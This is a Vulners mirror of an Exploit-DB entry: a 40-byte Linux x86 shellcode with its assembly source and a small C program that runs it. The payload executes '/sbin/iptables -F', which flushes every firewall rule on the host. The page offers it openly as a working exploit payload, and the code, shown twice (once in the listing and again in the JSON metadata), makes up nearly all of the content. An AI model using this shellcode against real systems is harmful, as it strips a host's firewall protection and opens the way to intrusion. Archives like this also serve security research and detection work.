Search...

linux/x86 - /sbin/iptables -F 40 bytes

2007-03-09T00:00:00

ID EDB-ID:13344
Type exploitdb
Reporter Kris Katterjohn
Modified 2007-03-09T00:00:00

Description

linux/x86 /sbin/iptables -F 40 bytes. Shellcode exploit for lin_x86 platform

                                        
                                            /* By Kris Katterjohn 11/18/2006
 *
 * 40 byte shellcode to flush iptables for Linux x86
 *
 *
 *
 * section .text
 *
 *      global _start
 *
 * _start:
 *
 * ; execve("/sbin/iptables", { "/sbin/iptables", "-F", NULL }, NULL)
 *
 *      push byte 11
 *      pop eax
 *      cdq
 *      push edx
 *      push word 0x462d
 *      mov ecx, esp
 *      push edx
 *      push word 0x7365
 *      push 0x6c626174
 *      push 0x70692f6e
 *      push 0x6962732f
 *      mov ebx, esp
 *      push edx
 *      push ecx
 *      push ebx
 *      mov ecx, esp
 *      int 0x80
 */

main()
{
       char shellcode[] =
               "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x46\x89"
               "\xe1\x52\x66\x68\x65\x73\x68\x74\x61\x62"
               "\x6c\x68\x6e\x2f\x69\x70\x68\x2f\x73\x62"
               "\x69\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";

       (*(void (*)()) shellcode)();
}

// milw0rm.com [2007-03-09]

JSON Vulners Source

Initial Source

{"published": "2007-03-09T00:00:00", "id": "EDB-ID:13344", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.8, "vector": "NONE"}, "vulnersScore": 6.8}, "hash": "3c9266247eb6d1610d7359de43f901735691266703b9601a5e223125acb5965c", "description": "linux/x86 /sbin/iptables -F 40 bytes. Shellcode exploit for lin_x86 platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/13344/", "lastseen": "2016-02-01T17:41:27", "edition": 1, "title": "linux/x86 - /sbin/iptables -F 40 bytes", "osvdbidlist": [], "modified": "2007-03-09T00:00:00", "bulletinFamily": "exploit", "cvelist": [], "sourceHref": "https://www.exploit-db.com/download/13344/", "references": [], "reporter": "Kris Katterjohn", "sourceData": "/* By Kris Katterjohn 11/18/2006\n *\n * 40 byte shellcode to flush iptables for Linux x86\n *\n *\n *\n * section .text\n *\n * global _start\n *\n * _start:\n *\n * ; execve(\"/sbin/iptables\", { \"/sbin/iptables\", \"-F\", NULL }, NULL)\n *\n * push byte 11\n * pop eax\n * cdq\n * push edx\n * push word 0x462d\n * mov ecx, esp\n * push edx\n * push word 0x7365\n * push 0x6c626174\n * push 0x70692f6e\n * push 0x6962732f\n * mov ebx, esp\n * push edx\n * push ecx\n * push ebx\n * mov ecx, esp\n * int 0x80\n */\n\nmain()\n{\n char shellcode[] =\n \"\\x6a\\x0b\\x58\\x99\\x52\\x66\\x68\\x2d\\x46\\x89\"\n \"\\xe1\\x52\\x66\\x68\\x65\\x73\\x68\\x74\\x61\\x62\"\n \"\\x6c\\x68\\x6e\\x2f\\x69\\x70\\x68\\x2f\\x73\\x62\"\n \"\\x69\\x89\\xe3\\x52\\x51\\x53\\x89\\xe1\\xcd\\x80\";\n\n (*(void (*)()) shellcode)();\n}\n\n// milw0rm.com [2007-03-09]", "objectVersion": "1.0"}